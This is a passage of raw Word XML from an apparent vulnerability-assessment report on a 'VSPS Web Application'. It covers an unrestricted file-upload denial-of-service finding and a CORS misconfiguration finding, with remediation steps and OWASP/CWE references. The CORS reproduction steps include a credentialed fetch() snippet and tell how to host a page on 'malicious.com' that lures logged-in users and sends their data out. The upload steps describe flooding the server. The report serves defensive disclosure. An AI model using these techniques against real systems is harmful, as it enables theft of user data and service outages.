    <w:p w14:paraId="36ADCAEC" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Design and implement comprehensive rate limiting at the network edge (WAF/Load Balancer) and within the application's business logic for all endpoints involving resource-intensive operations, especially file uploads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444E996C" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Adopt an API Gateway or similar solution to centralize security controls, including authentication, authorization, and rate limiting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1660AE56" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="009B7CCA">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="160CD483" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TACTICAL FIX (Code Implementation):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05417312" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Configure the application's server-side logic (e.g., Struts actions/interceptors) to strictly enforce maximum allowed file sizes for all uploads. This must be done on the server, as client-side checks are easily bypassed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE825F9" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Implement strict file type validation using a 'whitelist' approach, checking both file extensions and actual file content (magic bytes) to prevent malicious file uploads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77059047" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Add specific code to the file upload handler to track and limit the number of uploads from a single IP address, user account, or session within a given timeframe. This includes blocking or throttling requests exceeding predefined thresholds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7CF74B" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Ensure that temporary file storage used during uploads is properly managed and cleared, with limits on the total temporary storage allowed per session or globally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7427C9B1" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="64748B"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="64748B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35717626" w14:textId="0E16B516" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Access the </w:t>
      </w:r>
      <w:r w:rsidR="00877518">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">VSPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Web Application's file upload functionality. This may require logging in if the feature is authenticated. 2. Prepare a very large file (e.g., several gigabytes) or a script designed to upload numerous small files in rapid succession. 3. Attempt to upload the excessively large </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>file, or</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> execute the script to initiate a high volume of concurrent file uploads. 4. Observe the server's response: Verify if the large file is successfully uploaded despite size limits, or if multiple concurrent uploads are processed without any throttling or blocking. 5. Monitor server resource utilization (CPU, memory, disk I/O, network bandwidth) on the target system. Confirm if the excessive uploads lead to resource exhaustion or a denial-of-service condition for the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCE6A8B" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="0369A1"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0369A1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DA2F0F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4C471D" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://cwe.mitre.org/data/definitions/434.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F50F654" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://portswigger.net/web-security/file-upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4006E9B4" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64407B86" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CFBB6B"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39DB381A"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7455B562" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Cross-Origin Resource Sharing (CORS) Misconfiguration</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171C75AD" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>HIGH CVSS 6.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2A041783"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7A12C82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A06BCCD"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F85F7DC" w14:textId="1D964AA4"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028</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182A8A3"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8C367B" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D97706"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>6.5 (Medium)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="2BD5896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D96543B"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B2A30A0"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C98581F"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B79699C" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-942</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="76A15CB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A04CE1E"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5643A59"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11F6649"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CA3E552" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="2308645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76EE832"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4CE88A0"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25C4062"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81EDCC7" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="D97706"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="391F2C22"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3FEDB64"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333471F"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13C4827"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0A8DC7C" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7BECD8D5" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="4F46E5"/>
        </w:pBdr>
        <w:spacing w:before="300" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48476455" w14:textId="7BD8087C" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-Origin Resource Sharing (CORS) is a security mechanism implemented by web browsers that allows a web page on one domain to make requests to a resource on another domain. This vulnerability indicates that the </w:t>
      </w:r>
      <w:r w:rsidR="00877518">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">VSPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Web Application's API endpoints are configured with an overly permissive CORS policy, allowing requests from origins that should not be authorized. The root cause is a lack of strict validation of the 'Origin' header, often resulting in the 'Access-Control-Allow-Origin' header being set to a wildcard ('*') or reflecting the requesting origin without proper whitelist enforcement. Exploitation technically works by an attacker hosting a malicious webpage on a controlled domain. When a user visits this malicious page, client-side JavaScript can send requests to the vulnerable API endpoints on the </w:t>
      </w:r>
      <w:r w:rsidR="00877518">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">VSPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Web Application's domain. Due to the permissive CORS policy, the browser will allow these cross-origin requests, including those with sensitive user credentials (cookies, authentication tokens). This allows the attacker's script to read the responses from the API, effectively bypassing the same-origin policy and potentially exfiltrating sensitive data that the user has access to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E0DB94" w14:textId="5F4E7E77" w:rsidR="009B7CCA" w:rsidRDefault="00877518">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="D97706"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D97706"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E54C0A4" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FEF3C7"/>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This critical security flaw exposes the organization to significant risks, potentially leading to unauthorized data exposure and reputational damage. An attacker could exploit this </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>misconfiguration to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> bypass browser security policies, allowing them to steal sensitive customer data, proprietary business information, or user authentication tokens. This could result in direct financial losses through fraud or legal liabilities stemming from data breaches. Furthermore, failing to protect sensitive data may lead to non-compliance with regulatory frameworks such as NIST CSF, incurring hefty fines and sanctions. The erosion of customer trust and damage to the organization's brand reputation could have long-term negative effects on market standing and future growth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246F216E" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="16A34A"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="16A34A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5662483C" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">STRATEGIC FIX (Architecture): Implement a robust and strictly enforced Cross-Origin Resource Sharing (CORS) policy at an architectural level. This policy should be a central component of the application's security posture, ensuring all API endpoints validate incoming 'Origin' headers against a predefined whitelist of explicitly permitted domains. Avoid using wildcard origins ('*') unless </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>absolutely necessary</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> for public, non-sensitive resources, and even then, ensure no authentication credentials are ever sent. Consider implementing a dedicated CORS filter or module at the application gateway or web server level to centralize and enforce this policy across all relevant APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137A0662" w14:textId="5764DB4F" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">TACTICAL FIX (Code Implementation): Configure the </w:t>
      </w:r>
      <w:r w:rsidR="00877518">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">VSPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Web Application's API to send the 'Access-Control-Allow-Origin' header only with specific, whitelisted domains. Modify the server-side logic (e.g., in Java servlets or Struts actions) to check the 'Origin' header of incoming requests. If the 'Origin' is not in the approved whitelist, the server should either reject the request with a 403 Forbidden status or omit the 'Access-Control-Allow-Origin' header entirely from the response. For Struts 1 applications, this may involve implementing a custom filter (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>javax.servlet</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.Filter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">) to intercept requests and apply the CORS logic before they reach the Struts action. Ensure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>that 'Access-Control-Allow-Credentials' is only set to 'true' when strictly necessary and only for explicitly whitelisted origins. Review all API endpoints to ensure no sensitive data is accessible via requests from unauthorized origins.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B53963F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="64748B"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="64748B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B7D503" w14:textId="64A6F77E" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Identify a target API endpoint on the </w:t>
      </w:r>
      <w:r w:rsidR="00877518">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">VSPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Web Application (e.g., https://vsp.example.com/api/sensitiveData). 2. From an attacker-controlled domain (e.g., https://malicious.com), open a web browser's developer console and attempt to make a cross-origin request to the target API using JavaScript's </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> or Fetch API. For example:    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fetch(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'https://vsp.example.com/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sensitiveData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>', {credentials: 'include'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">})   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  .then</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(response =&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>response.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">())   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  .then</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(data =&gt; console.log(data</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">))   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  .catch</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(error =&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>console.error</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">('Error:', error)); 3. Observe the network traffic in the browser's developer tools. Specifically, check the response headers from the </w:t>
      </w:r>
      <w:r w:rsidR="00877518">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">VSPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">API endpoint. Look for the 'Access-Control-Allow-Origin' header. 4. If the 'Access-Control-Allow-Origin' header is set to '*' or reflects the attacker's origin ('https://malicious.com'), the vulnerability is confirmed. 5. To demonstrate data exfiltration, host a simple HTML page on the attacker-controlled domain containing the JavaScript code from step 2. Entice a legitimate user (logged into the </w:t>
      </w:r>
      <w:r w:rsidR="00877518">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">VSPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Web Application) to visit this malicious page. 6. The malicious script will execute in the user's browser context, send a request to the vulnerable </w:t>
      </w:r>
      <w:r w:rsidR="00877518">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">VSPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>API, and the response data (potentially sensitive) will be logged to the attacker's console or sent to their server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0773C409" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="0369A1"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0369A1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F344EFA" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Cross-Origin_Resource_Sharing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C6D87D" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://cwe.mitre.org/data/definitions/942.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6BFD11" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://portswigger.net/web-security/cors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D83DDB" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
